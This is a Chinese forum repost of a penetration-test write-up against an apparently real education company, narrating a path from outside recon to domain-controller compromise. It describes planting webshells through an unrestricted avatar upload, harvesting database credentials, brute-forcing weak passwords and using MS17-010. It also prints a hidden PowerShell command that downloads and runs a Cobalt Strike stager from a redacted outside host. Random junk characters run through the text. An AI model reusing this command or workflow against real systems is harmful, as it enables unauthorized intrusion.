|
( U5 R# c# c# }! a* O/ J+ J
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路) {4 x6 d+ p) I" e2 x
; d4 ]7 g, n h+ R
0 `7 O8 V2 H+ I' a* d' _ Q3 z: B. @9 Q& J, H
4 W) B5 G( G0 R0 G/ y, o" J/ d
5 c2 m9 E- U" k, S 正文
- P. r2 K' i0 [2 Z! U1 N& {
2 T/ y( t9 P0 R( z" o6 @, k
9 C M9 v' e& _
- c2 b+ N2 _/ x: i ) u8 ^" q) [0 ]# f: h5 l
+ g& p- p' A2 d5 T9 }, W. r! u. w 目标:www.xxxx.com(一家教育机构)
# C2 l0 t' y6 j4 N* G
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能! K7 Y- M8 _/ v% j: C' I
7 t! F9 l2 o# h D. B# B" a: g7 F- @& u
 $ i& q8 X1 A2 s! x0 l- Q. c
; H$ K9 w+ _" J, D" h/ a. o
. s9 A4 C! p; Q; P1 k# v0 k/ f* i 进行了简单的信息搜集
; i q* j, H: l4 f4 E
2 X, m! {2 ]% {, Y* M
8 ~1 m- C: I$ [$ z
0 L0 e) I: O2 s& ?
1 {+ q; X" B' S/ o+ p- G 子域名搜集( ^5 M; I- L# x% f) z1 ~
( w) J x$ I9 G* @# s* u0 \8 ]1 \6 L
& v0 G) l0 y; ~: K- a. @0 x/ Z3 c
3 U3 \" i8 o( i6 {) G/ _& [
* E5 I( ^+ ?% u5 r" O/ w8 W fofa找资产
" d* Q% d; A i6 G. k) b' b
7 @0 D: Y* B$ ~3 Q! e% j
2 W1 `! }0 g6 v: _. |
) |1 ?9 w# C; [ m9 i, l
$ B+ A( l5 F* a8 t 
, M2 Y% M, e7 L5 Y
8 W) Z7 f6 S. ^$ b/ Z. ]5 Z% ]/ ?
; p, T- x1 `/ e ^/ L& u 一共七个资产。去重之后只有两个。
$ K( ?% d) Z0 g- N7 t' L+ B
6 D2 y) u. o2 x
: X, M5 j: @" i3 |
5 s- o+ l3 L+ y2 z3 T& G4 v( }7 N5 X: q7 Q# U1 |
目录探测1 P* {2 R2 X( [$ o1 {5 C+ q( O O
) H$ ^% X r0 D4 N
" r" ?5 L( V( ]9 ^! e" l' h
# i2 y3 [/ {1 ~# L' {5 n
8 [4 U1 x4 e" H9 m8 {% ?. U# a3 e9 w B1 |% o% q; W8 u
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
b0 z" O+ D8 D3 w" |' W' S
1 g. J4 Z5 C$ Y8 q. O8 _4 B/ W3 _$ l
; Y5 i# z% L8 R" ~; M6 m( I# U
2 N" J" m0 X+ V% Y% G 我又尝试了通过修改返回包来绕过登录界面7 h3 {" W, p" ?
+ s) W U( o5 T& G
( }8 I {2 l1 q" Y  $ l$ s! m; E3 u h' J
2 D; e! n* `+ s
7 g- l0 S# \( K- H7 n1 u' L 还是不行,尝试注入无果2 Y- ^0 _" y" @) v. @5 C' o, @) Z
; o7 x# Z4 o6 Q: H. I
2 ^3 h4 p5 g0 o% P% P. ] 
1 W! Z3 L% K9 K7 e9 x" R* m+ F {* g ; y% m, M1 ~4 Y& e4 C1 s9 v. ~( I1 G
7 _; V, O. \7 b/ n8 R, N
不过我目录探测出了一处Spring信息泄露
a7 n) c9 @' Z8 K
6 k( [0 `6 ^3 X- ]% ^' e) u5 A1 Y9 t0 k8 z! c
) G" l$ ^, j; G1 ]; Z; R* `
0 R1 d3 e2 J& e3 }
1 o; }& ~- l' {" w- j' {7 [; ^8 ^ $ N& H! ^/ P( D6 J8 w0 w
. j" S7 \" E/ ^1 N
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
y; [' H+ ~. C' B
5 x6 _# _( B; g; L g' u# p" u+ N5 N6 ~4 f* L! A1 p
 ' W5 q. B1 E1 G/ U; a+ s! @$ F7 K
- c( H- D1 j, a6 z5 V! @0 h1 C+ C( ], t& O) o2 o
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
7 e) t7 t7 |" I5 @- L3 p h a
5 F' p9 o: b! T4 H% X6 `: [2 k. X5 ~0 }( e, Q8 z" P
 9 \# X5 j8 i$ H% o
l' j/ g) e, f% A5 r5 m2 G" @/ j" r7 }, }, m" A; o' @" ^+ b
获取有些师傅到这一步就手机抓包电脑测了。+ E/ M% P+ o8 X9 s9 l$ f6 {% ~
# g: u2 r. k2 w7 X7 y; p6 \& ~0 G/ a3 b
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。# l# _8 @+ K- R; A5 |
* u0 z, C. X* H% f6 h$ S% h1 K: a) s% Y" y/ O; t0 w9 G/ K5 ~( E' ~
其中在一个公众号发现了小程序,可以进行注册。
b; h& M4 a! _5 V3 E' H: }+ A7 ?" M! H
5 X) U a9 q; D) I+ w0 C: V- |# }5 H! ]+ z6 g R; o* T
看到了头像上传,尝试上传获取WebShell; X- D% q0 c+ {& Q& j8 H; D
" @& d" m0 R$ P6 [7 k6 @
, }1 h" P) }8 S* T5 l
" v' \* d0 N: |5 k* m0 G1 ~/ L+ V " ]( S' p2 b5 I& D, ?$ H, F% m. I
! r E9 @0 o6 q: h7 x: }2 p d- ^5 m 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
2 ~6 a( d7 ~( T3 K) M- S" z& b! r
$ u& F* O6 \' k' Z+ E+ P8 G
0 o& k/ P( X7 D2 j  : J( j/ g9 u1 V1 J, B3 {! o- R
. R9 i" T2 O$ d, A6 l, |5 e( t2 K- e) T4 [: z& F
然后上了大马4 U( |* q$ Z7 [4 V4 C& g: m# u% F
- G0 i. V, Z+ Y. ^# J6 P# P6 _: s
, [, \& _+ w5 ^: ~ 
3 \) [) m9 E! Y7 i! ~2 H3 [
* d) j3 m- g: _1 a) s' I ~; }& b: U& g H9 {
 ; J: m4 S& Z7 H# X8 ?2 |
, d- e" H. |" e. q; k7 e! C1 O) u# o5 o
通过翻找文件发现数据库账号密码3 p. A5 v, e* p1 j! {
# I9 x- ^ k) B( W8 K2 ?, i) ~$ N# g- P; Z8 v& s g+ u, S
 2 a! u0 ~7 x2 p( J' h( P4 C
( R# @; a$ q/ {+ k! v- _" H) m
! W6 `- a' s* {8 C/ s7 O. j& f$ F- Y
--内网渗透+ \+ r- u+ d* x; M, ?! |
$ m+ I, M' j1 `* m4 ~! y! R7 {
直接通过powershell执行 cs上线5 r" @: j2 a$ `9 Y V* r+ U- |
" H) A" h: D+ ~7 _' p% L
: F8 P- R; j8 }( W) p
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
+ x2 y' ]; h' r6 p5 a/ S " A* V9 D5 W( d D4 ]7 ?
% I$ O5 g1 ?4 x) ]$ F/ b8 K, u 
; j& ]2 A6 m" m. J7 l2 _ $ w7 x8 ?$ t+ {* l V
. k! L1 R7 @% s' B
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
- z' v* {% Y7 e; @, {- g+ b: n
L: p1 [" x9 Q# |
0 x) F: C2 @: B6 k# { [$ B  ! D: o! S ~. \. c/ Y
. |4 z! w) Y- D( K7 @. j
& M8 L( X& ?. @) h& J0 z0 g; G 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
4 M# j! H6 e0 b6 n& h/ W: h
. C" ^) @8 ~* H- N
% e, O& m' W' @* e# U! U5 A& s
" v, O) @( d( h8 U8 }5 H w
6 b9 p: X9 a, P* d) L# b. x V
7 g! f) ~( P: l, l# Y* `: B
% N3 h( c) Z b! Z# j2 f
* q0 @1 S* u, O9 F( G+ e 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
" P6 \, F3 b, u6 @' y
6 q3 V( @- Z# S [# N S
1 c. y8 E c, |3 W' t* |) T9 Y
e- Q! a( o0 m3 \
/ a. g6 k/ V) i, y" \3 T, @
7 Q/ Q- J$ y9 I! w$ I# J. [+ N2 X
1 p, ~' |2 A1 U9 E+ } I
5 v8 X! o2 R, I4 J
$ T6 F4 j7 F( E! R# p2 i) Y
. }1 X7 q* g/ L2 X* v
! a* s0 _7 r* l9 `; n' H- v
* [) `+ W: f) \0 p) W3 ^
4 j1 n( G' w9 x) Q# Z( d ( [' z& e$ v* s o! ?
- R8 K( Y0 K% w# h: I
8 D1 f5 U% p1 |+ n0 I
小结+ i! w2 b5 v0 y9 A/ Z8 Y1 B
8 F* q. E. n5 t1 @0 B6 s+ X' b% y1 `
. E( R! T l) V X6 r* a8 ^ 2 m) l- U& u0 ?
; r0 L4 L, P4 s9 T3 j 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!% Y7 f5 \: `9 E& a0 D; A. L( Q
# G# X- d* |. J
$ N1 B* l' ?, u/ s4 m# s+ n
- w6 U5 I9 u A9 t F9 `
% S. k; O6 b( s, L2 f. B C7 f
-
4 _4 K: }4 C z5 l& L- l+ r6 t
; B9 d: K, n" }
8 r# c7 u- A& }
-
; e" w) E) M( J* }2 N Q, b 6 U6 v; \; u* V: m/ `
! v& [% a2 m7 K1 Q" p% p
3 B: M3 \9 `+ \& {
" C: j) U& B% G$ b" k/ @" A& M6 h 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html0 H4 U+ q2 F( k1 ?8 w% T$ V+ q
9 Z9 ^6 N8 D& f8 D6 p$ N
/ ~( b$ w* T! W3 m/ P/ u 0 G* [ |6 @0 w5 [
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对